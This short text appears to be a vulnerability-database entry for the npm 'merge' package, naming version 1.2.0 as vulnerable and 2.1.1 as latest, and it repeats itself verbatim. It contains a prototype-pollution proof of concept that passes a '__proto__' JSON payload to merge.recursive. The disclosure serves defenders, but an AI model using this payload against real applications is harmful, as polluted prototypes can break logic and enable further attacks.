(recursive)? merging of (cloned)? objects.
Latest version: 2.1.1
const merge = require('merge');
merge.recursive({}, JSON.parse('{"__proto__": {"a": "b"}}'));
if (({}).a === 'b') console.log('exploitable');
Vulnerable versions: 1.2.0
(recursive)? merging of (cloned)? objects.
Latest version: 2.1.1
const merge = require('merge');
merge.recursive({}, JSON.parse('{"__proto__": {"a": "b"}}'));
if (({}).a === 'b') console.log('exploitable');
Vulnerable versions: 1.2.0